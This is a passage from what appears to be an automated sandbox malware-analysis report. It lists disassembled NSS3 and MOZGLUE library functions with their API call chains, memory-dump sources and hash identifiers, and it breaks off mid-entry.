                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90416DB4501606AFE740EF55D860F92BBA1BF55359F158128D8188BFA1EB73F834CB90
                                                                                                                                                                                                                          Function 6C49DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C49DDEC
                                                                                                                                                                                                                            • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C49DE70
                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C49DE83
                                                                                                                                                                                                                          • HASH_ResultLenByOidTag.NSS3(?), ref: 6C49DE95
                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C49DEAE
                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49DEBB
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DECC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1091488953-0
                                                                                                                                                                                                                          • Opcode ID: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
                                                                                                                                                                                                                          • Instruction ID: d30511af52402c2ea8b1f9a1e1ab657b394bc275dab328c84ce2a1ced914b554
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D31B7B29006246BEF00EF69AD41FBB7BA89F54609F050139ED09A7751FB31D91486E2
                                                                                                                                                                                                                          Function 6C477E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C477E48
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C477E5B
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477E7B
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59925C,?), ref: 6C477E92
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477EA1
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(00000004), ref: 6C477ED1
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(00000004), ref: 6C477EFA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3989529743-0
                                                                                                                                                                                                                          • Opcode ID: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
                                                                                                                                                                                                                          • Instruction ID: 677cfb5c98120e0505d8e5d4d079466cc86887269ab1090d0703ff0481d9a10a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4318FB2E052119BEB21DA659D40FAB77A8EF44259F564828DD19EBB01E720FC04C7F1
                                                                                                                                                                                                                          Function 6C4CDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC30
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC4E
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC5A
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4CDC7E
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4CDCAD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2632744278-0
                                                                                                                                                                                                                          • Opcode ID: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
                                                                                                                                                                                                                          • Instruction ID: 4ada438c8fb228685ece9323e89370b2de5b82c67103bebddc217d7e74ba9a64
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD318DB9A402009FE710DF59DC84E96B7F8AF04358F148029E949CBB10E7B1E944CBA2
                                                                                                                                                                                                                          Function 6C492E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C48E728,?,00000038,?,?,00000000), ref: 6C492E52
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E66
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E7B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C492E8F
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C492E9E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C492EAB
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C492F0D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3106257965-0
                                                                                                                                                                                                                          • Opcode ID: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                          • Instruction ID: bc05a042e1911b5117ee8dd2577e6361dbec1dc7ab1f5d16e0594a5ffe435b35
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5631F479A00515ABEB01EF28DC84C6ABB78FF56259B458178ED0887B11EB31ED64C7E0
                                                                                                                                                                                                                          Function 6C4B1EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1ECB
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1EF1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B1F01
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B1F39
                                                                                                                                                                                                                            • Part of subcall function 6C4BFE20: TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
                                                                                                                                                                                                                            • Part of subcall function 6C4BFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B1F67
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                                          • String ID: S&Kl
                                                                                                                                                                                                                          • API String ID: 704537481-2478177983
                                                                                                                                                                                                                          • Opcode ID: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                          • Instruction ID: 7fbdf13bd2eff6ae8f22998a0cb4cfd9092c546150f6028bdcc372b9a53b902f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75210175A04204ABEB00EF29DC44F9A3769AF85369F194128FD08ABB01E730E954C6F0
                                                                                                                                                                                                                          Function 6C4DCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
                                                                                                                                                                                                                            • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4291907967-0
                                                                                                                                                                                                                          • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                          • Instruction ID: a9b4ad21d98da494e41a0d4d2ea41cddc45b89b5bfbeb302f5d4d6e56ea57f08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F11A8A5F0120457E700FAA66C61FABB6EC9F5455EF05413DEC09D7B81FB60E90886F2
                                                                                                                                                                                                                          Function 6C488C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C488C1B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C488C34
                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3 ref: 6C488C65
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C488C9C
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C488CB6
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                          • String ID: KRAM
                                                                                                                                                                                                                          • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                          • Opcode ID: 2c1f0860af7e08271702e924886164c6efd6674387086cd506fe30ed26fa3fbf
                                                                                                                                                                                                                          • Instruction ID: da645e242d98a676da10d98a19870e2aa53b5aab6d62a87e2a5bd8d1a81003b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c1f0860af7e08271702e924886164c6efd6674387086cd506fe30ed26fa3fbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0216DB1A06A018FD700EF78C484D59BBF4BF45308B06896ED8888B705DB31E886CBC1
                                                                                                                                                                                                                          Function 6C498E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EA2
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EC3
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EDC
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C498EF1
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C498F20
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                          • String ID: b.Kl
                                                                                                                                                                                                                          • API String ID: 1978757487-3576770755
                                                                                                                                                                                                                          • Opcode ID: a9797862e37690af4c78d1e26641df66f6bab48f7f7e3264f8645b3d4f92276f
                                                                                                                                                                                                                          • Instruction ID: e3f2aaff8ccfca70267d5360b46e06c0756171a1020682c9ea4b6125ec88f1f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9797862e37690af4c78d1e26641df66f6bab48f7f7e3264f8645b3d4f92276f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33216874A096159FDB00EF29D488A99BBF0FF48318F41456EE8989BB41E730E854CBD6
                                                                                                                                                                                                                          Function 6C503E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C503E45
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
